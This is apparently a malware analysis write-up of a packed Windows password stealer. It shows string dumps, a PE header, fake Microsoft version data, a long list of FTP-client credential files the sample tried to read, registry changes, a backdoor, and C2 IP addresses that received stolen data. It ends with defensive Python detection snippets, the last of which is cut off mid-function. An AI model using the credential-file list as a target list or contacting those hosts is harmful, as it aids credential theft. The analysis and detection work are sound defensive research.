.data:00408778  0000000D C COMDLG32.DLL           
.data:00408788  00000015 C InitCommonControlsEx   
.data:0040879E  0000000D C COMCTL32.DLL           
.data:004087AE  0000000D C CoInitialize           
.data:004087BC  0000000A C OLE32.DLL
While the .rsrc data is encrypted..with (AGAIN) the signature "MopLon66"
.rsrc:004094C9  00000005 C E????                           
.rsrc:004094D0  0000000E C 884L4+8+4+444,                  
.rsrc:00409510  00000005 C ++++4                           
.rsrc:00409521  00000005 C ?<!??                           
.rsrc:00409530  00000007 C +44U((E                         
.rsrc:0040953E  00000005 C G&???                           
.rsrc:00409549  00000006 C PPYEEE                          
.rsrc:00409557  0000000A C ?E,?=!;EAX                      
.rsrc:00409587  00000005 C P!PPP                           
.rsrc:0040959E  00000007 C 6G/$@4P                         
.rsrc:004095A6  00000007 C P !;;;P                         
.rsrc:004095BA  00000005 C J\t%\t\t                        
.rsrc:004095CD  00000009 C E<E(=GGZZ                       
.rsrc:004095E1  00000009 C f@@@1W\x1BH/                    
.rsrc:004095F8  00000007 C >C:%\t$$                        
.rsrc:00409603  0000000A C TML]GG'>>9                      
.rsrc:0040960E  00000005 C 6CX@:                           
.rsrc:00409615  00000006 C 02\b\v\vL                       
.rsrc:0040961C  0000001B C J%\rC,0\\>\bRM6='^d:@X6V9:C>L%  
   :     :        :      :   :
   :     :        :      :   :
.rsrc:00420B24  00000006 C ,ik0kK        
.rsrc:00420CB3  00000005 C o!3JZ         
.rsrc:00420CE7  00000007 C ,pu//Io       
.rsrc:00420D0C  00000008 C l!af[Glr      
.rsrc:00420E58  00000005 C \ns0bs        
.rsrc:00420E9B  00000005 C FXl\r6        
.rsrc:00420EDE  00000005 C !\r;{d        
.rsrc:00420F47  00000005 C o'8@/         
.rsrc:00420F9E  00000007 C \nCG\n/}u     
.rsrc:00420FAF  00000006 C 6,-!dR        
.rsrc:0042117F  00000005 C &NPw:         
.rsrc:00421195  00000008 C fE='u@IY      
.rsrc:0042130E  00000005 C o7$WQ         
.rsrc:00421551  0000000B C ,UMopLon66  <====THERE.
Let's reverse it; I doubt it works well though... :-) Well, to make it short, you'll see a lot of undefined calls/functions like below, which, if you push it hard, will drag you to the exit command below:
loc_401B5E:             ; uExitCode
push    0
call    sub_401B78
push    hHeap           ; hHeap
call    j_HeapDestroy
call    j_ExitProcess
start endp
↑This suggests that you should break the crypter first before reversing. I don't have much time to play with this, so let's run it & see the evil acts.

Behavior Analysis

So friends, if you have an old PC, just install Windows XP on it and then install Wireshark, Regshot & Process Explorer so you can analyze how malware works! Do not depend on any VM environment for testing malware, since recent malware is compiled with code to detect VMs. This is based on my personal experience: without VM simulation you'll get much more data than those who use VMs. If you do daily work in a service center, please propose to your boss to prepare some cheap junk PCs for this purpose :-)

For the setup, use a basic installation of WinXP with Java, Adobe and IE; the older the versions, the better. Then back up the whole hard disk with Norton Ghost or G4L, to be restored after every test run. The software installed is as per my junk PC/RAT screenshot below:

↑It's how I tested this "mess". See the marked parts: they are the software I explained before, plus some shortcuts for picture snapshots (I use ONLY mspaint + notepad), and a full intranet connection + USB attached (for saving data). :-) Who says that analyzing malware is difficult? It is simple, isn't it?

So I just ran contacts.exe as per the pic above. It self-deletes, copies and executes KB0077165.exe with a CMD command, then all of a sudden stops, and then the NEW malicious file's process starts..↓

If we carefully look at the details, it was started from the %Temp% path↓

If we look at %Temp%, there were files dropped by this malware↓

This malware also creates threads via kernel.dll as per the snapshot below: which suggests it is threaded as a service. Let's find out more about how it goes below. The newly downloaded file itself has the below details:
0000  4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  MZ..............
0010  B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030  00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00  ................
0040  0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ........!..L.!Th
0050  69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno
0060  74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS
0070  6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00  mode....$.......
0080  F1 B6 E2 5C B5 D7 8C 0F B5 D7 8C 0F B5 D7 8C 0F  ................
0090  36 DF 83 0F B0 D7 8C 0F 36 DF D1 0F B8 D7 8C 0F  6.......6.......
00A0  B5 D7 8D 0F EA D7 8C 0F 3B DF D3 0F B8 D7 8C 0F  ........;.......
00B0  36 DF D0 0F B4 D7 8C 0F 3B DF EC 0F B8 D7 8C 0F  6.......;.......
00C0  36 DF D2 0F B4 D7 8C 0F 36 DF D6 0F B4 D7 8C 0F  6.......6.......
00D0  52 69 63 68 B5 D7 8C 0F 00 00 00 00 00 00 00 00  Rich............
00E0  50 45 00 00 4C 01 05 00 36 A9 81 3F 00 00 00 00  PE..L...6..?....
00F0  00 00 00 00 E0 00 02 01 0B 01 08 00 00 60 02 00  .............`..
0100  00 10 01 00 00 00 00 00 C7 11 00 00 00 10 00 00  ................
 :                         :                                :
MD5:    dde1d5cfed7d5646239aed75c0cd0add
Size:   196.0 KB ( 200704 bytes ) 
Name:   exp2.tmp.exe
block   0x40
type    EXEC (Executable file)
os      windows
arch    i386
bits    32
endian  little
Entry Point:  0x11c7
Compile Time: 0x3F81A936 [Mon Oct 06 17:41:10 2003 UTC]
Compiler Trace: MS Visual C++

Sections:
  .text 0x1000 0x25052 155648
  .rdata 0x27000 0x9d4 4096
  .data 0x28000 0x100418 4096
  .rsrc 0x129000 0x67a0 28672

//Fake MS Product Attributes:
  LangID: 040904B0
  LegalCopyright: \xa9 Microsoft Corporation. All rights reserved.
  InternalName: Eudcedit  
  FileVersion: 5.2.3790.3959 (srv03_sp2_rtm.070216-1710)  
  CompanyName: Microsoft Corporation  
  ProductName: Microsoft\xae Windows\xae Operating System  
  ProductVersion: 5.2.3790.3959  
  FileDescription: Private Character Editor  
  OriginalFilename: EUDCEDIT.EXE  
  
//Full Registry Activity...(incl. Deletion...)
  ADVAPI32.dll.RegCloseKey Hint[395]
  ADVAPI32.dll.RegSetValueExW Hint[442]
  ADVAPI32.dll.RegQueryInfoKeyW Hint[426]
  ADVAPI32.dll.RegDeleteValueW Hint[405]
  ADVAPI32.dll.RegEnumValueW Hint[412]
  ADVAPI32.dll.RegEnumKeyExW Hint[409]
  ADVAPI32.dll.RegDeleteKeyW Hint[403]
  ADVAPI32.dll.RegCreateKeyExW Hint[400]
  ADVAPI32.dll.RegOpenKeyExW Hint[421]


// interesting strings...

.text:0040B554  00000779 C vo8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8
.text:0041172C  00000177 C o8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho.text:0041B0A4  000000DD C ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho3\a
.text:0041C984  00000626 C ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8
.text:00425BDC  00000477 C 8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho

What kind of data has been stolen??

What this file did was shocking: it was trying to open/load autoexec & the configuration file of every internet-account-related piece of software, as detected in the list below:
c:\autoexec.bat [Open File Attempt Detected]
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID [Open File Attempt Detected]
C:\WINDOWS\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Program Files\GlobalSCAPE\CuteFTP Lite\sm.dat [Open File Attempt Detected]
C:\Program Files\CuteFTP\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Quick.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\History.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\FileZilla\filezilla.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.sqlite [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs [Open File Attempt Detected]
C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\WINDOWS\32BitFtp.ini [Open File Attempt Detected]
C:\DOCUME~1\~1\LOCALS~1\Temp\Client Hash [Open File Attempt Detected]
Well, this explains how the credentials got stolen.... every version/location of autoexec.bat and of the credential files of the famous FTP softwares (FileZilla, FlashFXP, CuteFTP, Total Commander, etc.) was grabbed...
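To turn the list above into something a sandbox or EDR analyst can reuse, here is an added detection example (written for this page, not part of the original post or of any tool it mentions). It parses "Open File Attempt Detected" lines, maps each path to the FTP-client credential store it belongs to, and raises a verdict when several distinct stores are probed in one run. The log lines are constructed from the paths shown in the report; the store labels and the threshold are the editor's own choices.

```python
"""Classify sandbox 'Open File Attempt Detected' lines by credential store.

Added example, not from the original post. SAMPLE_LOG is constructed from the
paths listed in the report; labels, regexes and the threshold are assumptions.
"""
import re
from collections import Counter

# (label, regex applied to the lower-cased path). One entry per client family
# whose credential file the sample probed; matching is on the file name, so the
# many per-user / All Users / Local Settings variants collapse onto one label.
CREDENTIAL_STORES = [
    ("Total Commander FTP (wcx_ftp.ini)", r"\\wcx_ftp\.ini$"),
    ("CuteFTP site manager (sm.dat)", r"\\cuteftp[^\\]*\\sm\.dat$"),
    ("FlashFXP (Sites/Quick/History.dat)", r"\\flashfxp\\[34]\\(sites|quick|history)\.dat$"),
    ("FileZilla XML config", r"\\filezilla\\(sitemanager|recentservers|filezilla)\.xml$"),
    ("ExpanDrive (drives.js)", r"\\expandrive\\drives\.js$"),
    ("CoffeeCup SharedSettings", r"\\sharedsettings(_\d+_\d+_\d+)?\.(ccs|sqlite)$"),
    ("32BitFtp (32BitFtp.ini)", r"\\32bitftp\.ini$"),
]

LINE_RE = re.compile(r"^(?P<path>.+?)\s+\[Open File Attempt Detected\]\s*$")

# Constructed subset of the sandbox output shown in the report.
SAMPLE_LOG = r"""
c:\autoexec.bat [Open File Attempt Detected]
C:\WINDOWS\wcx_ftp.ini [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FlashFXP\4\Sites.dat [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\sitemanager.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\FileZilla\recentservers.xml [Open File Attempt Detected]
C:\Documents and Settings\\Application Data\ExpanDrive\drives.js [Open File Attempt Detected]
C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite [Open File Attempt Detected]
C:\WINDOWS\32BitFtp.ini [Open File Attempt Detected]
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID [Open File Attempt Detected]
"""


def classify_path(path):
    """Return the credential-store label for a path, or None if it is not one."""
    p = path.lower()
    for label, pattern in CREDENTIAL_STORES:
        if re.search(pattern, p):
            return label
    return None


def scan(log_text):
    """Count hits per credential store; return (Counter, list of unmatched paths)."""
    hits = Counter()
    other = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a file-open event
        label = classify_path(m.group("path"))
        if label:
            hits[label] += 1
        else:
            other.append(m.group("path"))
    return hits, other


def is_credential_stealer(log_text, min_distinct=3):
    """Verdict: probing several distinct client stores in one run is the tell.

    A single wcx_ftp.ini open could be Total Commander itself; a process that
    walks FileZilla, FlashFXP and CuteFTP stores in sequence is not.
    """
    hits, _ = scan(log_text)
    return len(hits) >= min_distinct


if __name__ == "__main__":
    hits, other = scan(SAMPLE_LOG)
    for label, n in hits.most_common():
        print(f"{n:2d}  {label}")
    print("unclassified:", other)
    print("credential stealer:", is_credential_stealer(SAMPLE_LOG))
```

The threshold on distinct stores rather than on raw hit count is deliberate: the sample generates dozens of opens because it tries every profile directory variant, but a legitimate FTP client touches only its own file, so breadth across vendors is the signal.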

Registry Activity

These are the registry data read:
Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ], 
     Value Name: [ CUAS ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ], 
     Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
Key: [ HKLM\SYSTEM\Setup ], 
     Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], 
     Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ], 
     Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ], 
     Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ], 
     Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
Meanwhile, it added the below keys:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR, and
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal
putting in the below values:
HWID: 7B 38 38 45 38 35 31 37 37 2D 42 44 38 38 2D 34 33 45 34 2D 39 32 32 33 2D 39 39 45 43 38 34 42 31 33 38 34 42 7D (ASCII: {88E85177-BD88-43E4-9223-99EC84B1384B}, a GUID-shaped string), and -
C:\Documents and Settings\\My Documents 
The malware also read & took your IE data, as traced in the mutex names below:
//Read IE internet history...
0x4ac c:!documents and settings!user!cookies!
0x4ac c:!documents and settings!user!local settings!history!history.ie5!
0x4ac c:!documents and settings!user!local settings!temporary internet files!content.ie5!
The malware also opened a backdoor with the below service:
Bind to Host:  localhost
ServiceName: SERVICES_ACTIVE_DATABASE 
Port: (MACHINE_DNS_SERVER) TCP/53 (DNS)

Network Activity

How the taken data was sent can be described as follows.
1. Sent data to remote hosts via HTTP/1.1 POST to the below HOST:PORT:
180.235.150.72:8080 203.113.98.131:80 173.224.221.135:8080 206.176.226.157:8080
2. Other connection establishment attempts were also detected, to these IPs:
132.248.49.112 113.130.65.77
The complete recorded comm. data is in the PCAP; the summary of the above connections can be seen here -->>[HERE] ↑ We can assume the CnC of this operation is at those IPs.
3. The Password Stealer exp2.tmp.exe was downloaded from these hosts. Below is the capture..
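For defenders who cannot get at the PCAP but do keep proxy logs, here is an added example (written for this page, not part of the original post) that matches outbound requests against the HOST:PORT pairs above. The Squid-style access log lines are constructed; only the IP:port pairs come from the report. A POST to an exact host:port pair is reported as a CnC check-in, while any other contact with those hosts, or with the two lower-confidence IPs, is reported as a contact attempt.

```python
"""Flag outbound HTTP POSTs to the CnC/proxy endpoints listed in the report.

Added example, not from the original post. SAMPLE_ACCESS_LOG is constructed in
Squid native format; the IoC sets are the IP:port pairs from the report.
"""
import re

# HOST:PORT pairs the sample POSTed stolen data to (from the report).
CNC_ENDPOINTS = {
    ("180.235.150.72", 8080),
    ("203.113.98.131", 80),
    ("173.224.221.135", 8080),
    ("206.176.226.157", 8080),
}
# Hosts with connection attempts but no confirmed POST in the report.
SUSPECT_HOSTS = {"132.248.49.112", "113.130.65.77"}

# Squid native format: ts elapsed client code/status bytes method url user hier type
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)
URL_RE = re.compile(r"^(?P<scheme>https?)://(?P<host>[^/:]+)(?::(?P<port>\d+))?")

# Constructed log: one true check-in, one benign request, one POST to a CnC
# host on its default port, one failed GET to a lower-confidence host.
SAMPLE_ACCESS_LOG = """\
1355000000.123    412 10.0.0.15 TCP_MISS/200 1320 POST http://180.235.150.72:8080/ - DIRECT/180.235.150.72 text/html
1355000001.456     88 10.0.0.15 TCP_MISS/200 5400 GET http://www.example.com/index.html - DIRECT/93.184.216.34 text/html
1355000002.789    600 10.0.0.22 TCP_MISS/200 900 POST http://203.113.98.131/ - DIRECT/203.113.98.131 text/html
1355000003.000    300 10.0.0.22 TCP_MISS/503 0 GET http://132.248.49.112/ - DIRECT/132.248.49.112 -
"""


def parse_url(url):
    """Return (host, port) from a URL, applying the scheme default when no port is given."""
    m = URL_RE.match(url)
    if not m:
        return None, None
    if m.group("port"):
        port = int(m.group("port"))
    else:
        port = 443 if m.group("scheme") == "https" else 80
    return m.group("host"), port


def classify(line):
    """Return (kind, client, host, port) for an IoC hit, else None."""
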